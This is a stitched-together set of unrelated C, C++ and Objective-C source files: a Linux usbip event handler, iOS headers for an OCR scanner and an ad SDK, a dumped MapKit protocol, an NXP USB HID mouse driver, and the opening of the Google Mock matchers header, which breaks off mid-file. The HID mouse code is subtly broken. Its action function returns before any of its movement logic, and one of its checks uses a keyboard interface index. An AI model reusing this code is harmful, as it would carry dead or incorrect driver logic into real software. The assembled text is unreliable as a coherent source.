		 * NOTE: shutdown must come first.
		 * Shutdown the device.
		 */
		if (ud->event & USBIP_EH_SHUTDOWN) {
			ud->eh_ops.shutdown(ud);
			unset_event(ud, USBIP_EH_SHUTDOWN);
		}

		/* Reset the device. */
		if (ud->event & USBIP_EH_RESET) {
			ud->eh_ops.reset(ud);
			unset_event(ud, USBIP_EH_RESET);
		}

		/* Mark the device as unusable. */
		if (ud->event & USBIP_EH_UNUSABLE) {
			ud->eh_ops.unusable(ud);
			unset_event(ud, USBIP_EH_UNUSABLE);
		}
		mutex_unlock(&ud->sysfs_lock);

		/* Wake anyone blocked in usbip_stop_eh() waiting for completion. */
		wake_up(&ud->eh_waitq);
	}
}

/* Prepare a device for event handling (clears pending events). */
int usbip_start_eh(struct usbip_device *ud)
{
	init_waitqueue_head(&ud->eh_waitq);
	ud->event = 0;
	return 0;
}
EXPORT_SYMBOL_GPL(usbip_start_eh);

/* Wait until all events other than USBIP_EH_BYE have been handled. */
void usbip_stop_eh(struct usbip_device *ud)
{
	unsigned long pending = ud->event & ~USBIP_EH_BYE;

	if (!(ud->event & USBIP_EH_BYE))
		usbip_dbg_eh("usbip_eh stopping but not removed\n");

	if (pending)
		usbip_dbg_eh("usbip_eh waiting completion %lx\n", pending);

	wait_event_interruptible(ud->eh_waitq, !(ud->event & ~USBIP_EH_BYE));

	usbip_dbg_eh("usbip_eh has stopped\n");
}
EXPORT_SYMBOL_GPL(usbip_stop_eh);

#define WORK_QUEUE_NAME "usbip_event"

static struct workqueue_struct *usbip_queue;
static DECLARE_WORK(usbip_work, event_handler);

/* Create the single-threaded workqueue that runs event_handler(). */
int usbip_init_eh(void)
{
	usbip_queue = create_singlethread_workqueue(WORK_QUEUE_NAME);
	if (usbip_queue == NULL) {
		pr_err("failed to create usbip_event\n");
		return -ENOMEM;
	}
	return 0;
}

/* Flush and destroy the event workqueue. */
void usbip_finish_eh(void)
{
	flush_workqueue(usbip_queue);
	destroy_workqueue(usbip_queue);
	usbip_queue = NULL;
}

/*
 * Record 'event' on the device and queue it for the event handler.
 * A device already on event_list is not queued twice; allocation uses
 * GFP_ATOMIC because we hold event_lock (IRQs disabled).  An allocation
 * failure silently drops the queuing (the event bits stay set on ud).
 */
void usbip_event_add(struct usbip_device *ud, unsigned long event)
{
	struct usbip_event *ue;
	unsigned long flags;

	if (ud->event & USBIP_EH_BYE)
		return;

	set_event(ud, event);

	spin_lock_irqsave(&event_lock, flags);

	list_for_each_entry_reverse(ue, &event_list, node) {
		if (ue->ud == ud)
			goto out;
	}

	ue = kmalloc(sizeof(struct usbip_event), GFP_ATOMIC);
	if (ue == NULL)
		goto out;

	ue->ud = ud;

	list_add_tail(&ue->node, &event_list);
	queue_work(usbip_queue, &usbip_work);

out:
	spin_unlock_irqrestore(&event_lock, flags);
}
EXPORT_SYMBOL_GPL(usbip_event_add);

/* Return 1 if the device has any pending event bits set, else 0. */
int usbip_event_happened(struct usbip_device *ud)
{
	int happened = 0;
	unsigned long flags;

	spin_lock_irqsave(&ud->lock, flags);
	if (ud->event != 0)
		happened = 1;
	spin_unlock_irqrestore(&ud->lock, flags);

	return happened;
}
EXPORT_SYMBOL_GPL(usbip_event_happened);

/* Return 1 if 'task' is the event-handler worker thread itself. */
int usbip_in_eh(struct task_struct *task)
{
	if (task == worker_context)
		return 1;

	return 0;
}
EXPORT_SYMBOL_GPL(usbip_in_eh);
//
//  ImageProcessingProtocol.h
//  Tesseract BizScanner
//
//  Created by Abhilash S T P on 4/4/14.
//  Copyright (c) 2014 Abhilash S T P. All rights reserved.
//

#import <Foundation/Foundation.h>
// FIX: UIImage is declared in UIKit, not Foundation; without this import the
// protocol only compiles if every includer happens to import UIKit first.
#import <UIKit/UIKit.h>

// Pipeline of image-processing steps applied to a scanned image before OCR.
@protocol ImageProcessingProtocol <NSObject>

// Runs the full processing pipeline on `src` and returns the processed image.
- (UIImage*) processImage:(UIImage*) src;

// Path to the OCR language (traineddata) file.
// NOTE(review): method name has typos ("Languge", "FIle") — kept as-is because
// renaming would break every existing conformer/caller; fix in a coordinated change.
- (NSString*) pathToLangugeFIle;

// Individual processing stages; each returns a new image derived from `src`.
- (UIImage*) processRotation:(UIImage*)src;   // deskew / orientation correction
- (UIImage*) processHistogram:(UIImage*)src;  // histogram adjustment
- (UIImage*) processFilter:(UIImage*)src;     // filtering (e.g. noise reduction)
- (UIImage*) processBinarize:(UIImage*)src;   // black/white thresholding

// Contour detection on `src`; no image is returned (side effects only).
- (void) contoursImage:(UIImage *)src;

@end
//
//  AdMoGoInterstitialManager.h
//  AdsMogo
//
//  Created by Daxiong on 14-4-28.
//
//

#import "AdMoGoInterstitial.h"
#import <Foundation/Foundation.h>

// Singleton manager that creates, caches and removes interstitial (full-screen)
// ad instances, keyed by app key.
@interface AdMoGoInterstitialManager : NSObject

// Global configuration; the key set here identifies the "default" interstitial.
+ (void)setAppKey:(NSString *)key;
+ (void)setRootViewController:(UIViewController *)rvc;
+ (void)setDefaultDelegate:(id)delegate;

// Shared singleton instance.
+ (AdMoGoInterstitialManager *)shareInstance;

// Creates the "default" interstitial (for the key set via +setAppKey:).
- (void)initDefaultInterstitial;
// Returns the "default" interstitial instance.
- (AdMoGoInterstitial *)defaultInterstitial;

// Lookup/creation of interstitial (and video-interstitial) instances per app key.
- (AdMoGoInterstitial *)adMogoInterstitialByAppKey:(NSString *)appKey;
- (AdMoGoInterstitial *)adMogoVideoInterstitialByAppKey:(NSString *)appKey;
- (AdMoGoInterstitial *)adMogoInterstitialByAppKey:(NSString *)appKey isManualRefresh:(BOOL)isManualRefresh;
- (AdMoGoInterstitial *)adMogoVideoInterstitialByAppKey:(NSString *)appKey isManualRefresh:(BOOL)isManualRefresh;

// Removal of cached instances.
- (void)removeInterstitialInstance;
- (void)removeInterstitialInstanceByAppKey:(NSString *)key;
- (void)removeVideoInterstitialInstanceByAppKey:(NSString *)key;
- (void)removeAllInterstitialInstance;

/*----------------------------------*/
//
// The following methods are wrappers around the full-screen ad instance that
// operate directly on the "default" interstitial object.
// You can also obtain the object for a given key via
// - (AdMoGoInterstitial *)adMogoInterstitialByAppKey:(NSString *)appKey
// and operate on it directly.
//
// NOTE: the object whose key was set via + (void)setAppKey:(NSString *)key
// is treated as the "default" interstitial object.
//
/*----------------------------------*/
/**
 * Enter a display opportunity (show the default interstitial).
 * isWait: whether to wait for an ad when none is currently available to show.
 */
- (void)interstitialShow:(BOOL)isWait;
/**
 * Leave the display opportunity (cancel showing the default interstitial).
 */
- (void)interstitialCancel;

@end
/*
 * This header is generated by classdump-dyld 1.0
 * on Sunday, June 7, 2020 at 11:23:47 AM Mountain Standard Time
 * Operating System: Version 13.4.5 (Build 17L562)
 * Image Source: /System/Library/Frameworks/MapKit.framework/MapKit
 * classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos.
 */

// Observer protocol for MapKit's private ETA provider; both callbacks are
// optional. (Dumped private API — argument types are untyped `id` by nature
// of the class dump; do not rely on specific classes without verifying.)
@protocol MKETAProviderObserver <NSObject>
@optional
// Called when the provider's ETA estimate is updated.
-(void)ETAProviderUpdated:(id)arg1;
// Called when the provider's location input is updated.
-(void)ETAProviderLocationUpdated:(id)arg1;
@end
/* * The Clear BSD License * Copyright (c) 2015, Freescale Semiconductor, Inc. * Copyright 2016 NXP * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted (subject to the limitations in the disclaimer below) provided * that the following conditions are met: * * o Redistributions of source code must retain the above copyright notice, this list * of conditions and the following disclaimer. * * o Redistributions in binary form must reproduce the above copyright notice, this * list of conditions and the following disclaimer in the documentation and/or * other materials provided with the distribution. * * o Neither the name of the copyright holder nor the names of its * contributors may be used to endorse or promote products derived from this * software without specific prior written permission. * * NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ #include "usb_device_config.h" #include "usb.h" #include "usb_device.h" #include "usb_device_class.h" #include "usb_device_hid.h" #include "usb_device_ch9.h" #include "usb_device_descriptor.h" #include "composite.h" #include "hid_mouse.h" /******************************************************************************* * Definitions ******************************************************************************/ /******************************************************************************* * Prototypes ******************************************************************************/ static usb_status_t USB_DeviceHidMouseAction(void); /******************************************************************************* * Variables ******************************************************************************/ USB_DMA_NONINIT_DATA_ALIGN(USB_DATA_ALIGN_SIZE) static uint8_t s_MouseBuffer[USB_HID_MOUSE_REPORT_LENGTH]; static usb_device_composite_struct_t *s_UsbDeviceComposite; static usb_device_hid_mouse_struct_t s_UsbDeviceHidMouse; /******************************************************************************* * Code ******************************************************************************/ /* Update mouse pointer location. Draw a rectangular rotation*/ static usb_status_t USB_DeviceHidMouseAction(void) { return kStatus_USB_Success; static int8_t x = 0U; static int8_t y = 0U; enum { RIGHT, DOWN, LEFT, UP }; static uint8_t dir = RIGHT; switch (dir) { case RIGHT: /* Move right. Increase X value. */ s_UsbDeviceHidMouse.buffer[1] = 1U; s_UsbDeviceHidMouse.buffer[2] = 0U; x++; if (x > 99U) { dir++; } break; case DOWN: /* Move down. Increase Y value. */ s_UsbDeviceHidMouse.buffer[1] = 0U; s_UsbDeviceHidMouse.buffer[2] = 1U; y++; if (y > 99U) { dir++; } break; case LEFT: /* Move left. Discrease X value. */ s_UsbDeviceHidMouse.buffer[1] = (uint8_t)(0xFFU); s_UsbDeviceHidMouse.buffer[2] = 0U; x--; if (x < 1U) { dir++; } break; case UP: /* Move up. Discrease Y value. 
*/ s_UsbDeviceHidMouse.buffer[1] = 0U; s_UsbDeviceHidMouse.buffer[2] = (uint8_t)(0xFFU); y--; if (y < 1U) { dir = RIGHT; } break; default: break; } return USB_DeviceHidSend(s_UsbDeviceComposite->hidMouseHandle, USB_HID_MOUSE_ENDPOINT_IN, s_UsbDeviceHidMouse.buffer, USB_HID_MOUSE_REPORT_LENGTH); } /* The device HID class callback */ usb_status_t USB_DeviceHidMouseCallback(class_handle_t handle, uint32_t event, void *param) { usb_status_t error = kStatus_USB_Error; switch (event) { case kUSB_DeviceHidEventSendResponse: if (s_UsbDeviceComposite->attach) { return USB_DeviceHidMouseAction(); } break; case kUSB_DeviceHidEventGetReport: case kUSB_DeviceHidEventSetReport: case kUSB_DeviceHidEventRequestReportBuffer: error = kStatus_USB_InvalidRequest; break; case kUSB_DeviceHidEventGetIdle: case kUSB_DeviceHidEventGetProtocol: case kUSB_DeviceHidEventSetIdle: case kUSB_DeviceHidEventSetProtocol: break; default: break; } return error; } /* The device callback */ usb_status_t USB_DeviceHidMouseSetConfigure(class_handle_t handle, uint8_t configure) { if (USB_COMPOSITE_CONFIGURE_INDEX == configure) { return USB_DeviceHidMouseAction(); /* run the cursor movement code */ } return kStatus_USB_Error; } /* Set interface */ usb_status_t USB_DeviceHidMouseSetInterface(class_handle_t handle, uint8_t interface, uint8_t alternateSetting) { if (USB_HID_KEYBOARD_INTERFACE_INDEX == interface) { return USB_DeviceHidMouseAction(); /* run the cursor movement code */ } return kStatus_USB_Error; } /* Initialize the HID mouse */ usb_status_t USB_DeviceHidMouseInit(usb_device_composite_struct_t *deviceComposite) { s_UsbDeviceComposite = deviceComposite; s_UsbDeviceHidMouse.buffer = s_MouseBuffer; return kStatus_USB_Success; }
// Copyright 2007, Google Inc. // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following disclaimer // in the documentation and/or other materials provided with the // distribution. // * Neither the name of Google Inc. nor the names of its // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Author: wan@google.com (Zhanyong Wan) // Google Mock - a framework for writing C++ mock classes. // // This file implements some commonly used argument matchers. More // matchers can be defined by the user implementing the // MatcherInterface<T> interface if necessary. 
#ifndef GMOCK_INCLUDE_GMOCK_GMOCK_MATCHERS_H_
#define GMOCK_INCLUDE_GMOCK_GMOCK_MATCHERS_H_

#include <math.h>
#include <algorithm>
#include <iterator>
#include <limits>
#include <ostream>  // NOLINT
#include <sstream>
#include <string>
#include <utility>
#include <vector>

#include "gmock/internal/gmock-internal-utils.h"
#include "gmock/internal/gmock-port.h"
#include "gtest/gtest.h"

#if GTEST_HAS_STD_INITIALIZER_LIST_
# include <initializer_list>  // NOLINT -- must be after gtest.h
#endif

namespace testing {

// To implement a matcher Foo for type T, define:
//   1. a class FooMatcherImpl that implements the
//      MatcherInterface<T> interface, and
//   2. a factory function that creates a Matcher<T> object from a
//      FooMatcherImpl*.
//
// The two-level delegation design makes it possible to allow a user
// to write "v" instead of "Eq(v)" where a Matcher is expected, which
// is impossible if we pass matchers by pointers.  It also eases
// ownership management as Matcher objects can now be copied like
// plain values.

// MatchResultListener is an abstract class.  Its << operator can be
// used by a matcher to explain why a value matches or doesn't match.
//
// TODO(wan@google.com): add method
//   bool InterestedInWhy(bool result) const;
// to indicate whether the listener is interested in why the match
// result is 'result'.
class MatchResultListener {
 public:
  // Creates a listener object with the given underlying ostream.  The
  // listener does not own the ostream, and does not dereference it
  // in the constructor or destructor.
  explicit MatchResultListener(::std::ostream* os) : stream_(os) {}
  virtual ~MatchResultListener() = 0;  // Makes this class abstract.

  // Streams x to the underlying ostream; does nothing if the ostream
  // is NULL.
  template <typename T>
  MatchResultListener& operator<<(const T& x) {
    if (stream_ != NULL)
      *stream_ << x;
    return *this;
  }

  // Returns the underlying ostream.
  ::std::ostream* stream() { return stream_; }

  // Returns true iff the listener is interested in an explanation of
  // the match result.  A matcher's MatchAndExplain() method can use
  // this information to avoid generating the explanation when no one
  // intends to hear it.
  bool IsInterested() const { return stream_ != NULL; }

 private:
  ::std::ostream* const stream_;

  GTEST_DISALLOW_COPY_AND_ASSIGN_(MatchResultListener);
};

// Out-of-line definition of the pure virtual destructor: required because the
// destructor is pure only to make the class abstract, yet it is still called
// by derived-class destructors.
inline MatchResultListener::~MatchResultListener() {
}

// An instance of a subclass of this knows how to describe itself as a
// matcher.
class MatcherDescriberInterface {
 public:
  virtual ~MatcherDescriberInterface() {}

  // Describes this matcher to an ostream.  The function should print
  // a verb phrase that describes the property a value matching this
  // matcher should have.  The subject of the verb phrase is the value
  // being matched.  For example, the DescribeTo() method of the Gt(7)
  // matcher prints "is greater than 7".
  virtual void DescribeTo(::std::ostream* os) const = 0;

  // Describes the negation of this matcher to an ostream.  For
  // example, if the description of this matcher is "is greater than
  // 7", the negated description could be "is not greater than 7".
  // You are not required to override this when implementing
  // MatcherInterface, but it is highly advised so that your matcher
  // can produce good error messages.
  virtual void DescribeNegationTo(::std::ostream* os) const {
    *os << "not (";
    DescribeTo(os);
    *os << ")";
  }
};

// The implementation of a matcher.
template <typename T>
class MatcherInterface : public MatcherDescriberInterface {
 public:
  // Returns true iff the matcher matches x; also explains the match
  // result to 'listener' if necessary (see the next paragraph), in
  // the form of a non-restrictive relative clause ("which ...",
  // "whose ...", etc) that describes x.  For example, the
  // MatchAndExplain() method of the Pointee(...) matcher should
  // generate an explanation like "which points to ...".
  //
  // Implementations of MatchAndExplain() should add an explanation of
  // the match result *if and only if* they can provide additional
  // information that's not already present (or not obvious) in the
  // print-out of x and the matcher's description.  Whether the match
  // succeeds is not a factor in deciding whether an explanation is
  // needed, as sometimes the caller needs to print a failure message
  // when the match succeeds (e.g. when the matcher is used inside
  // Not()).
  //
  // For example, a "has at least 10 elements" matcher should explain
  // what the actual element count is, regardless of the match result,
  // as it is useful information to the reader; on the other hand, an
  // "is empty" matcher probably only needs to explain what the actual
  // size is when the match fails, as it's redundant to say that the
  // size is 0 when the value is already known to be empty.
  //
  // You should override this method when defining a new matcher.
  //
  // It's the responsibility of the caller (Google Mock) to guarantee
  // that 'listener' is not NULL.  This helps to simplify a matcher's
  // implementation when it doesn't care about the performance, as it
  // can talk to 'listener' without checking its validity first.
  // However, in order to implement dummy listeners efficiently,
  // listener->stream() may be NULL.
  virtual bool MatchAndExplain(T x, MatchResultListener* listener) const = 0;

  // Inherits these methods from MatcherDescriberInterface:
  //   virtual void DescribeTo(::std::ostream* os) const = 0;
  //   virtual void DescribeNegationTo(::std::ostream* os) const;
};

// A match result listener that stores the explanation in a string.
class StringMatchResultListener : public MatchResultListener {
 public:
  StringMatchResultListener() : MatchResultListener(&ss_) {}

  // Returns the explanation accumulated so far.
  internal::string str() const { return ss_.str(); }

  // Clears the explanation accumulated so far.
  void Clear() { ss_.str(""); }

 private:
  ::std::stringstream ss_;

  GTEST_DISALLOW_COPY_AND_ASSIGN_(StringMatchResultListener);
};

namespace internal {

// A match result listener that ignores the explanation.
class DummyMatchResultListener : public MatchResultListener {
 public:
  DummyMatchResultListener() : MatchResultListener(NULL) {}

 private:
  GTEST_DISALLOW_COPY_AND_ASSIGN_(DummyMatchResultListener);
};

// A match result listener that forwards the explanation to a given
// ostream.  The difference between this and MatchResultListener is
// that the former is concrete.
class StreamMatchResultListener : public MatchResultListener {
 public:
  explicit StreamMatchResultListener(::std::ostream* os)
      : MatchResultListener(os) {}

 private:
  GTEST_DISALLOW_COPY_AND_ASSIGN_(StreamMatchResultListener);
};

// An internal class for implementing Matcher<T>, which will derive
// from it.  We put functionalities common to all Matcher<T>
// specializations here to avoid code duplication.
template <typename T>
class MatcherBase {
 public:
  // Returns true iff the matcher matches x; also explains the match
  // result to 'listener'.
  bool MatchAndExplain(T x, MatchResultListener* listener) const {
    return impl_->MatchAndExplain(x, listener);
  }

  // Returns true iff this matcher matches x.
  bool Matches(T x) const {
    DummyMatchResultListener dummy;
    return MatchAndExplain(x, &dummy);
  }

  // Describes this matcher to an ostream.
  void DescribeTo(::std::ostream* os) const { impl_->DescribeTo(os); }

  // Describes the negation of this matcher to an ostream.
  void DescribeNegationTo(::std::ostream* os) const {
    impl_->DescribeNegationTo(os);
  }

  // Explains why x matches, or doesn't match, the matcher.
  void ExplainMatchResultTo(T x, ::std::ostream* os) const {
    StreamMatchResultListener listener(os);
    MatchAndExplain(x, &listener);
  }

  // Returns the describer for this matcher object; retains ownership
  // of the describer, which is only guaranteed to be alive when
  // this matcher object is alive.
  const MatcherDescriberInterface* GetDescriber() const {
    return impl_.get();
  }

 protected:
  MatcherBase() {}

  // Constructs a matcher from its implementation.
  explicit MatcherBase(const MatcherInterface<T>* impl) : impl_(impl) {}

  virtual ~MatcherBase() {}

 private:
  // shared_ptr (util/gtl/shared_ptr.h) and linked_ptr have similar
  // interfaces.  The former dynamically allocates a chunk of memory
  // to hold the reference count, while the latter tracks all
  // references using a circular linked list without allocating
  // memory.  It has been observed that linked_ptr performs better in
  // typical scenarios.  However, shared_ptr can out-perform
  // linked_ptr when there are many more uses of the copy constructor
  // than the default constructor.
  //
  // If performance becomes a problem, we should see if using
  // shared_ptr helps.
  ::testing::internal::linked_ptr<const MatcherInterface<T> > impl_;
};

}  // namespace internal

// A Matcher<T> is a copyable and IMMUTABLE (except by assignment)
// object that can check whether a value of type T matches.  The
// implementation of Matcher<T> is just a linked_ptr to const
// MatcherInterface<T>, so copying is fairly cheap.  Don't inherit
// from Matcher!
template <typename T>
class Matcher : public internal::MatcherBase<T> {
 public:
  // Constructs a null matcher.  Needed for storing Matcher objects in STL
  // containers.  A default-constructed matcher is not yet initialized.  You
  // cannot use it until a valid value has been assigned to it.
  Matcher() {}

  // Constructs a matcher from its implementation.
  explicit Matcher(const MatcherInterface<T>* impl)
      : internal::MatcherBase<T>(impl) {}

  // Implicit constructor here allows people to write
  // EXPECT_CALL(foo, Bar(5)) instead of EXPECT_CALL(foo, Bar(Eq(5))) sometimes
  Matcher(T value);  // NOLINT

};

// The following two specializations allow the user to write str
// instead of Eq(str) and "foo" instead of Eq("foo") when a string
// matcher is expected.
template <>
class GTEST_API_ Matcher<const internal::string&>
    : public internal::MatcherBase<const internal::string&> {
 public:
  Matcher() {}

  explicit Matcher(const MatcherInterface<const internal::string&>* impl)
      : internal::MatcherBase<const internal::string&>(impl) {}

  // Allows the user to write str instead of Eq(str) sometimes, where
  // str is a string object.
  Matcher(const internal::string& s);  // NOLINT

  // Allows the user to write "foo" instead of Eq("foo") sometimes.
  Matcher(const char* s);  // NOLINT
};

template <>
class GTEST_API_ Matcher<internal::string>
    : public internal::MatcherBase<internal::string> {
 public:
  Matcher() {}

  explicit Matcher(const MatcherInterface<internal::string>* impl)
      : internal::MatcherBase<internal::string>(impl) {}

  // Allows the user to write str instead of Eq(str) sometimes, where
  // str is a string object.
  Matcher(const internal::string& s);  // NOLINT

  // Allows the user to write "foo" instead of Eq("foo") sometimes.
  Matcher(const char* s);  // NOLINT
};

#if GTEST_HAS_STRING_PIECE_
// The following two specializations allow the user to write str
// instead of Eq(str) and "foo" instead of Eq("foo") when a StringPiece
// matcher is expected.
template <>
class GTEST_API_ Matcher<const StringPiece&>
    : public internal::MatcherBase<const StringPiece&> {
 public:
  Matcher() {}

  explicit Matcher(const MatcherInterface<const StringPiece&>* impl)
      : internal::MatcherBase<const StringPiece&>(impl) {}

  // Allows the user to write str instead of Eq(str) sometimes, where
  // str is a string object.
  Matcher(const internal::string& s);  // NOLINT

  // Allows the user to write "foo" instead of Eq("foo") sometimes.
  Matcher(const char* s);  // NOLINT

  // Allows the user to pass StringPieces directly.
  Matcher(StringPiece s);  // NOLINT
};

template <>
class GTEST_API_ Matcher<StringPiece>
    : public internal::MatcherBase<StringPiece> {
 public:
  Matcher() {}

  explicit Matcher(const MatcherInterface<StringPiece>* impl)
      : internal::MatcherBase<StringPiece>(impl) {}

  // Allows the user to write str instead of Eq(str) sometimes, where
  // str is a string object.
  Matcher(const internal::string& s);  // NOLINT

  // Allows the user to write "foo" instead of Eq("foo") sometimes.
  Matcher(const char* s);  // NOLINT

  // Allows the user to pass StringPieces directly.
  Matcher(StringPiece s);  // NOLINT
};
#endif  // GTEST_HAS_STRING_PIECE_

// The PolymorphicMatcher class template makes it easy to implement a
// polymorphic matcher (i.e. a matcher that can match values of more
// than one type, e.g. Eq(n) and NotNull()).
//
// To define a polymorphic matcher, a user should provide an Impl
// class that has a DescribeTo() method and a DescribeNegationTo()
// method, and define a member function (or member function template)
//
//   bool MatchAndExplain(const Value& value,
//                        MatchResultListener* listener) const;
//
// See the definition of NotNull() for a complete example.
template <class Impl>
class PolymorphicMatcher {
 public:
  explicit PolymorphicMatcher(const Impl& an_impl) : impl_(an_impl) {}

  // Returns a mutable reference to the underlying matcher
  // implementation object.
  Impl& mutable_impl() { return impl_; }

  // Returns an immutable reference to the underlying matcher
  // implementation object.
  const Impl& impl() const { return impl_; }

  // Converts this polymorphic matcher to a monomorphic Matcher<T> by
  // wrapping a copy of the implementation object.
  template <typename T>
  operator Matcher<T>() const {
    return Matcher<T>(new MonomorphicImpl<T>(impl_));
  }

 private:
  template <typename T>
  class MonomorphicImpl : public MatcherInterface<T> {
   public:
    explicit MonomorphicImpl(const Impl& impl) : impl_(impl) {}

    virtual void DescribeTo(::std::ostream* os) const {
      impl_.DescribeTo(os);
    }

    virtual void DescribeNegationTo(::std::ostream* os) const {
      impl_.DescribeNegationTo(os);
    }

    virtual bool MatchAndExplain(T x, MatchResultListener* listener) const {
      return impl_.MatchAndExplain(x, listener);
    }

   private:
    const Impl impl_;

    GTEST_DISALLOW_ASSIGN_(MonomorphicImpl);
  };

  Impl impl_;

  GTEST_DISALLOW_ASSIGN_(PolymorphicMatcher);
};

// Creates a matcher from its implementation.  This is easier to use
// than the Matcher<T> constructor as it doesn't require you to
// explicitly write the template argument, e.g.
//
//   MakeMatcher(foo);
// vs
//   Matcher<const string&>(foo);
template <typename T>
inline Matcher<T> MakeMatcher(const MatcherInterface<T>* impl) {
  return Matcher<T>(impl);
}

// Creates a polymorphic matcher from its implementation.  This is
// easier to use than the PolymorphicMatcher<Impl> constructor as it
// doesn't require you to explicitly write the template argument, e.g.
//
//   MakePolymorphicMatcher(foo);
// vs
//   PolymorphicMatcher<TypeOfFoo>(foo);
template <class Impl>
inline PolymorphicMatcher<Impl> MakePolymorphicMatcher(const Impl& impl) {
  return PolymorphicMatcher<Impl>(impl);
}

// Anything inside the 'internal' namespace IS INTERNAL IMPLEMENTATION
// and MUST NOT BE USED IN USER CODE!!!
namespace internal {

// The MatcherCastImpl class template is a helper for implementing
// MatcherCast().  We need this helper in order to partially
// specialize the implementation of MatcherCast() (C++ allows
// class/struct templates to be partially specialized, but not
// function templates.).  This general version is used when
// MatcherCast()'s argument is a polymorphic matcher (i.e. something
// that can be converted to a Matcher but is not one yet; for
// example, Eq(value)) or a value (for example, "hello").
template <typename T, typename M>
class MatcherCastImpl {
 public:
  static Matcher<T> Cast(const M& polymorphic_matcher_or_value) {
    // M can be a polymorphic matcher, in which case we want to use
    // its conversion operator to create Matcher<T>.  Or it can be a value
    // that should be passed to the Matcher<T>'s constructor.
    //
    // We can't call Matcher<T>(polymorphic_matcher_or_value) when M is a
    // polymorphic matcher because it'll be ambiguous if T has an implicit
    // constructor from M (this usually happens when T has an implicit
    // constructor from any type).
    //
    // It won't work to unconditionally implicit_cast
    // polymorphic_matcher_or_value to Matcher<T> because it won't trigger
    // a user-defined conversion from M to T if one exists (assuming M is
    // a value).
    return CastImpl(
        polymorphic_matcher_or_value,
        BooleanConstant<
            internal::ImplicitlyConvertible<M, Matcher<T> >::value>());
  }

 private:
  static Matcher<T> CastImpl(const M& value, BooleanConstant<false>) {
    // M can't be implicitly converted to Matcher<T>, so M isn't a polymorphic
    // matcher.  It must be a value then.  Use direct initialization to create
    // a matcher.
    return Matcher<T>(ImplicitCast_<T>(value));
  }

  static Matcher<T> CastImpl(const M& polymorphic_matcher_or_value,
                             BooleanConstant<true>) {
    // M is implicitly convertible to Matcher<T>, which means that either
    // M is a polymorphic matcher or Matcher<T> has an implicit constructor
    // from M.  In both cases using the implicit conversion will produce a
    // matcher.
    //
    // Even if T has an implicit constructor from M, it won't be called because
    // creating Matcher<T> would require a chain of two user-defined conversions
    // (first to create T from M and then to create Matcher<T> from T).
    return polymorphic_matcher_or_value;
  }
};

// This more specialized version is used when MatcherCast()'s argument
// is already a Matcher.  This only compiles when type T can be
// statically converted to type U.
template <typename T, typename U>
class MatcherCastImpl<T, Matcher<U> > {
 public:
  static Matcher<T> Cast(const Matcher<U>& source_matcher) {
    return Matcher<T>(new Impl(source_matcher));
  }

 private:
  class Impl : public MatcherInterface<T> {
   public:
    explicit Impl(const Matcher<U>& source_matcher)
        : source_matcher_(source_matcher) {}

    // We delegate the matching logic to the source matcher.
    virtual bool MatchAndExplain(T x, MatchResultListener* listener) const {
      return source_matcher_.MatchAndExplain(static_cast<U>(x), listener);
    }

    virtual void DescribeTo(::std::ostream* os) const {
      source_matcher_.DescribeTo(os);
    }

    virtual void DescribeNegationTo(::std::ostream* os) const {
      source_matcher_.DescribeNegationTo(os);
    }

   private:
    const Matcher<U> source_matcher_;

    GTEST_DISALLOW_ASSIGN_(Impl);
  };
};

// This even more specialized version is used for efficiently casting
// a matcher to its own type.
template <typename T>
class MatcherCastImpl<T, Matcher<T> > {
 public:
  static Matcher<T> Cast(const Matcher<T>& matcher) { return matcher; }
};

}  // namespace internal

// In order to be safe and clear, casting between different matcher
// types is done explicitly via MatcherCast<T>(m), which takes a
// matcher m and returns a Matcher<T>.  It compiles only when T can be
// statically converted to the argument type of m.
template <typename T, typename M>
inline Matcher<T> MatcherCast(const M& matcher) {
  return internal::MatcherCastImpl<T, M>::Cast(matcher);
}

// Implements SafeMatcherCast().
//
// We use an intermediate class to do the actual safe casting as Nokia's
// Symbian compiler cannot decide between
//   template <T, M> ... (M)
// and
//   template <T, U> ... (const Matcher<U>&)
// for function templates but can for member function templates.
